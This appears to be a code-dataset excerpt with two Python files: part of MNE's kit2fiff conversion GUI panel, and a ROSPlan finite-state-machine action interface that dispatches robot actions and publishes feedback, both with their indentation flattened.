def close(self, info, is_ok):
if info.object.kit2fiff_panel.queue.unfinished_tasks:
msg = ("Can not close the window while saving is still in "
"progress. Please wait until all files are processed.")
title = "Saving Still in Progress"
information(None, msg, title)
return False
else:
return True
class Kit2FiffPanel(HasPrivateTraits):
"""Control panel for kit2fiff conversion"""
model = Instance(Kit2FiffModel)
# model copies for view
use_mrk = DelegatesTo('model')
sqd_file = DelegatesTo('model')
hsp_file = DelegatesTo('model')
fid_file = DelegatesTo('model')
stim_coding = DelegatesTo('model')
stim_chs = DelegatesTo('model')
stim_chs_ok = DelegatesTo('model')
stim_chs_comment = DelegatesTo('model')
stim_slope = DelegatesTo('model')
stim_threshold = DelegatesTo('model')
# info
can_save = DelegatesTo('model')
sqd_fname = DelegatesTo('model')
hsp_fname = DelegatesTo('model')
fid_fname = DelegatesTo('model')
# Source Files
reset_dig = Button
# Visualization
scene = Instance(MlabSceneModel)
fid_obj = Instance(PointObject)
elp_obj = Instance(PointObject)
hsp_obj = Instance(PointObject)
# Output
save_as = Button(label='Save FIFF...')
clear_all = Button(label='Clear All')
queue = Instance(queue.Queue, ())
queue_feedback = Str('')
queue_current = Str('')
queue_len = Int(0)
queue_len_str = Property(Str, depends_on=['queue_len'])
error = Str('')
view = View(
VGroup(VGroup(Item('sqd_file', label="Data",
tooltip=tooltips['sqd_file']),
Item('sqd_fname', show_label=False, style='readonly'),
Item('hsp_file', label='Dig Head Shape'),
Item('hsp_fname', show_label=False, style='readonly'),
Item('fid_file', label='Dig Points'),
Item('fid_fname', show_label=False, style='readonly'),
Item('reset_dig', label='Clear Digitizer Files',
show_label=False),
Item('use_mrk', editor=use_editor, style='custom'),
label="Sources", show_border=True),
VGroup(Item('stim_slope', label="Event Onset", style='custom',
tooltip=tooltips['stim_slope'],
editor=EnumEditor(
values={'+': '2:Peak (0 to 5 V)',
'-': '1:Trough (5 to 0 V)'},
cols=2)),
Item('stim_coding', label="Value Coding", style='custom',
editor=EnumEditor(values={'>': '1:little-endian',
'<': '2:big-endian',
'channel': '3:Channel#'},
cols=3),
tooltip=tooltips["stim_coding"]),
Item('stim_chs', label='Channels', style='custom',
tooltip=tooltips["stim_chs"],
editor=TextEditor(evaluate_name='stim_chs_ok',
auto_set=True)),
Item('stim_chs_comment', label='>', style='readonly'),
Item('stim_threshold', label='Threshold',
tooltip=tooltips['stim_threshold']),
label='Events', show_border=True),
HGroup(Item('save_as', enabled_when='can_save'), spring,
'clear_all', show_labels=False),
Item('queue_feedback', show_label=False, style='readonly'),
Item('queue_current', show_label=False, style='readonly'),
Item('queue_len_str', show_label=False, style='readonly')
)
)
def __init__(self, *args, **kwargs):
super(Kit2FiffPanel, self).__init__(*args, **kwargs)
# setup save worker
def worker():
while True:
raw, fname = self.queue.get()
basename = os.path.basename(fname)
self.queue_len -= 1
self.queue_current = 'Processing: %s' % basename
# task
try:
raw.save(fname, overwrite=True)
except Exception as err:
self.error = str(err)
res = "Error saving: %s"
else:
res = "Saved: %s"
# finalize
self.queue_current = ''
self.queue_feedback = res % basename
self.queue.task_done()
t = Thread(target=worker)
t.daemon = True
t.start()
# setup mayavi visualization
m = self.model
self.fid_obj = PointObject(scene=self.scene, color=(25, 225, 25),
point_scale=5e-3)
self.elp_obj = PointObject(scene=self.scene, color=(50, 50, 220),
point_scale=1e-2, opacity=.2)
self.hsp_obj = PointObject(scene=self.scene, color=(200, 200, 200),
point_scale=2e-3)
if not _testing_mode():
for name, obj in zip(['fid', 'elp', 'hsp'],
[self.fid_obj, self.elp_obj, self.hsp_obj]):
m.sync_trait(name, obj, 'points', mutual=False)
m.sync_trait('head_dev_trans', obj, 'trans', mutual=False)
self.scene.camera.parallel_scale = 0.15
self.scene.mlab.view(0, 0, .15)
def _clear_all_fired(self):
self.model.clear_all()
@cached_property
def _get_queue_len_str(self):
if self.queue_len:
return "Queue length: %i" % self.queue_len
else:
return ''
def _reset_dig_fired(self):
self.reset_traits(['hsp_file', 'fid_file'])
def _save_as_fired(self):
# create raw
try:
raw = self.model.get_raw()
except Exception as err:
error(None, str(err), "Error Creating KIT Raw")
raise
# find default path
stem, _ = os.path.splitext(self.sqd_file)
if not stem.endswith('raw'):
stem += '-raw'
default_path = stem + '.fif'
# save as dialog
dlg = FileDialog(action="save as",
wildcard="fiff raw file (*.fif)|*.fif",
default_path=default_path)
dlg.open()
if dlg.return_code != OK:
return
fname = dlg.path
if not fname.endswith('.fif'):
fname += '.fif'
if os.path.exists(fname):
answer = confirm(None, "The file %r already exists. Should it "
"be replaced?", "Overwrite File?")
if answer != YES:
return
self.queue.put((raw, fname))
self.queue_len += 1
class Kit2FiffFrame(HasTraits):
"""GUI for interpolating between two KIT marker files"""
model = Instance(Kit2FiffModel, ())
scene = Instance(MlabSceneModel, ())
headview = Instance(HeadViewController)
marker_panel = Instance(CombineMarkersPanel)
kit2fiff_panel = Instance(Kit2FiffPanel)
view = View(HGroup(VGroup(Item('marker_panel', style='custom'),
show_labels=False),
VGroup(Item('scene',
editor=SceneEditor(scene_class=MayaviScene),
dock='vertical', show_label=False),
VGroup(headview_item, show_labels=False),
),
VGroup(Item('kit2fiff_panel', style='custom'),
show_labels=False),
show_labels=False,
),
handler=Kit2FiffFrameHandler(),
height=700, resizable=True, buttons=NoButtons)
def _headview_default(self):
return HeadViewController(scene=self.scene, scale=160, system='RAS')
def _kit2fiff_panel_default(self):
return Kit2FiffPanel(scene=self.scene, model=self.model)
def _marker_panel_default(self):
return CombineMarkersPanel(scene=self.scene, model=self.model.markers,
trans=als_ras_trans)
|
FSMActionInterface.py
|
#!/usr/bin/env python
import rospy, copy
import actionlib
from BaseActionInterface import BaseActionInterface
from ActionlibActionInterface import ActionlibActionInterface
from ServiceActionInterface import ServiceActionInterface
import threading
from rosplan_dispatch_msgs.msg import ActionFeedback
# ToDo: Implement mechanism to check cyclic execution
class Transition(object):
def __init__(self, state_name, effects):
self._to_state = state_name
self._effects = '' # ToDo: parse pddl expression for effects
def get_to_state(self):
return self._to_state
def get_effects(self):
return self._effects
class State(object):
def __init__(self, state_name, action_interface, transitions):
# Name
self._state_name = state_name
# Action Interface
self._action_interface = action_interface
# Transitions
self._transitions = transitions
def get_state_name(self):
return self._state_name
def get_action_interface(self):
return self._action_interface
def get_transition(self, transition_name, counter):
rospy.loginfo("transition_name = {}; counter = {}".format(transition_name, counter))
return self._transitions[transition_name][counter]
class FSMActionInterface(BaseActionInterface):
def __init__(self, action_config, parent_ai, action_feedback_pub):
BaseActionInterface.__init__(self, action_config, parent_ai, action_feedback_pub)
# 'Static' data
self._states = {}
# 'Dynamic' data
self._running_state = {}
self._transition_value = {}
self._to_start_state = {}
self._transitions_counters = {}
# ToDo: Where and how to clear the dynamic data after the actions were executed
for state_config in action_config["states"]:
if state_config["interface_type"] == "actionlib":
ai = ActionlibActionInterface(state_config, self, self._action_feedback_pub)
transitions = self.parse_transitions(state_config)
if state_config["interface_type"] == "service":
ai = ServiceActionInterface(state_config, self, self._action_feedback_pub)
transitions = self.parse_transitions(state_config)
if state_config["interface_type"] == "fsm":
ai = FSMActionInterface(state_config, self, self._action_feedback_pub)
transitions = self.parse_transitions(state_config)
self._states[state_config["name"]] = State(state_config["name"], ai, transitions)
def pass_child_action_finished_cb(self, transition_value, dispatch_msg):
self._transition_value[dispatch_msg.plan_id][dispatch_msg.action_id] = transition_value
def run(self, dispatch_msg):
# Run on a new thread
new_thread = threading.Thread(target=self.run_thread, args=(dispatch_msg,))
new_thread.start()
def run_thread(self, dispatch_msg):
rospy.loginfo('KCL: ({}) Plan {} Action {}: State machine {} running on thread {}'.format(rospy.get_name(),
dispatch_msg.plan_id,
dispatch_msg.action_id,
self.get_action_name(),
threading.currentThread()))
# Extend the dictionaries if needed
if dispatch_msg.plan_id not in self._running_state:
self._running_state[dispatch_msg.plan_id] = {}
self._transition_value[dispatch_msg.plan_id] = {}
self._to_start_state[dispatch_msg.plan_id] = {}
self._transitions_counters[dispatch_msg.plan_id] = {}
if dispatch_msg.action_id not in self._running_state[dispatch_msg.plan_id]:
self._running_state[dispatch_msg.plan_id][dispatch_msg.action_id] = None
self._transition_value[dispatch_msg.plan_id][dispatch_msg.action_id] = None
self._to_start_state[dispatch_msg.plan_id][dispatch_msg.action_id] = False
self._transitions_counters[dispatch_msg.plan_id][dispatch_msg.action_id] = {}
self._transitions_counters[dispatch_msg.plan_id][dispatch_msg.action_id]["succeeded"] = 0
self._transitions_counters[dispatch_msg.plan_id][dispatch_msg.action_id]["failed"] = 0
# Start running the first basic action
self._running_state[dispatch_msg.plan_id][dispatch_msg.action_id] = self._states["ba1"]
action_interface = self._running_state[dispatch_msg.plan_id][dispatch_msg.action_id].get_action_interface()
action_interface.run(dispatch_msg)
# Execute the fsm
fsm_execution_completed = False
while not fsm_execution_completed:
transition_value = self._transition_value[dispatch_msg.plan_id][dispatch_msg.action_id]
if not transition_value == None:
# Reset the transition value
self._transition_value[dispatch_msg.plan_id][dispatch_msg.action_id] = None
# Based on the passed transition value get the transition and modify the counters accordingly
transition = None
if transition_value == "succeeded":
transition_counter = self._transitions_counters[dispatch_msg.plan_id][dispatch_msg.action_id]["succeeded"]
transition = self._running_state[dispatch_msg.plan_id][dispatch_msg.action_id].get_transition("succeeded", transition_counter)
self._transitions_counters[dispatch_msg.plan_id][dispatch_msg.action_id]["succeeded"] += 1
self._transitions_counters[dispatch_msg.plan_id][dispatch_msg.action_id]["failed"] = 0
if transition_value == "failed":
transition_counter = self._transitions_counters[dispatch_msg.plan_id][dispatch_msg.action_id]["failed"]
transition = self._running_state[dispatch_msg.plan_id][dispatch_msg.action_id].get_transition("failed", transition_counter)
self._transitions_counters[dispatch_msg.plan_id][dispatch_msg.action_id]["failed"] += 1
self._transitions_counters[dispatch_msg.plan_id][dispatch_msg.action_id]["succeeded"] = 0
if transition.get_to_state().find("ba") != -1:
# If this fsm is on the highest level and it is transited for the first time to a reverse state
if transition.get_to_state().find("reverse") != -1 and \
not self._to_start_state[dispatch_msg.plan_id][dispatch_msg.action_id] and \
self._parent_ai is None:
# Mark the execution to start state
self._to_start_state[dispatch_msg.plan_id][dispatch_msg.action_id] = True
# Publish feedback
fb = ActionFeedback()
fb.action_id = dispatch_msg.action_id
fb.plan_id = dispatch_msg.plan_id
fb.status = ActionFeedback.ACTION_DISPATCHED_TO_START_STATE
self._action_feedback_pub.publish(fb)
rospy.loginfo('KCL: ({}) Plan {} Action {}: Transition to state {}'.format(rospy.get_name(),
dispatch_msg.plan_id,
dispatch_msg.action_id,
transition.get_to_state()))
# Update the running state and get the names of the old and new states
old_running_state_name = self._running_state[dispatch_msg.plan_id][
dispatch_msg.action_id].get_state_name()
self._running_state[dispatch_msg.plan_id][dispatch_msg.action_id] = self._states[
transition.get_to_state()]
new_running_state_name = self._running_state[dispatch_msg.plan_id][
dispatch_msg.action_id].get_state_name()
# Reset the transition counters for the next state only if transited to another state
if old_running_state_name != new_running_state_name:
self._transitions_counters[dispatch_msg.plan_id][dispatch_msg.action_id]["succeeded"] = 0
self._transitions_counters[dispatch_msg.plan_id][dispatch_msg.action_id]["failed"] = 0
# Run the action interface of the new state
action_interface = self._running_state[dispatch_msg.plan_id][
dispatch_msg.action_id].get_action_interface()
action_interface.run(dispatch_msg)
# If this function was called from the goal state of the fsm
elif transition.get_to_state() == "goal_state":
# If this fsm is also a state in another fsm pass the status
if self._parent_ai is not None:
self._parent_ai.pass_child_action_finished_cb("succeeded", dispatch_msg)
else:
# If this action interface has a parent interface
rospy.loginfo('KCL: ({}) Plan {} Action {}: State machine {} finished to goal state'.format(rospy.get_name(),
dispatch_msg.plan_id,
dispatch_msg.action_id,
self.get_action_name()))
# Apply the end effects
self._kb_link.kb_apply_action_effects(dispatch_msg, 1)
# Publish feedback: action succeeded to goal state
fb = ActionFeedback()
fb.action_id = dispatch_msg.action_id
fb.plan_id = dispatch_msg.plan_id
fb.status = ActionFeedback.ACTION_SUCCEEDED_TO_GOAL_STATE
self._action_feedback_pub.publish(fb)
# Break the while True loop
fsm_execution_completed = True
# If this function was called from the start state of the fsm
elif transition.get_to_state() == "start_state":
# If this fsm is also a state in another fsm pass the status
# ToDo: Check what should be passed to a higher level fsm
if self._parent_ai is not None:
self._parent_ai.pass_child_action_finished_cb("succeeded", dispatch_msg)
else:
# Otherwise, if this fsm is on the highest level, set the final status
rospy.loginfo('KCL: ({}) Plan {} Action {}: State machine {} finished to start state'.format(rospy.get_name(),
dispatch_msg.plan_id,
dispatch_msg.action_id,
self.get_action_name()))
# Apply the end effects
self._kb_link.kb_undo_action_effects(dispatch_msg, 0)
# Publish feedback: action succeeded to start state
fb = ActionFeedback()
fb.action_id = dispatch_msg.action_id
fb.plan_id = dispatch_msg.plan_id
fb.status = ActionFeedback.ACTION_SUCCEEDED_TO_START_STATE
self._action_feedback_pub.publish(fb)
# Break the while True loop
fsm_execution_completed = True
# If this function was called from an error state of the fsm
elif transition.get_to_state() == "error_state":
rospy.logwarn(
'KCL: ({}) Plan {} Action {}: State machine {} error. Human intervention needed'.format(rospy.get_name(),
dispatch_msg.plan_id,
dispatch_msg.action_id,
self.get_action_name()))
else:
rospy.logwarn(
'KCL: ({}) Plan {} Action {}: State machine {} error: Transition to unknown state'.format(
rospy.get_name(),
dispatch_msg.plan_id,
dispatch_msg.action_id,
self.get_action_name()))
def parse_transitions(self, state):
# Create a dictionary with all transition types, where for each of them an array with transitions is parsed
# from the input yaml file
transitions = {}
transitions["succeeded"] = []
transitions["failed"] = []
for transition in state["transitions"]["succeeded"]:
transitions["succeeded"].append(Transition(transition["to_state"], transition["effects"]))
for transition in state["transitions"]["failed"]:
transitions["failed"].append(Transition(transition["to_state"], transition["effects"]))
return transitions
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.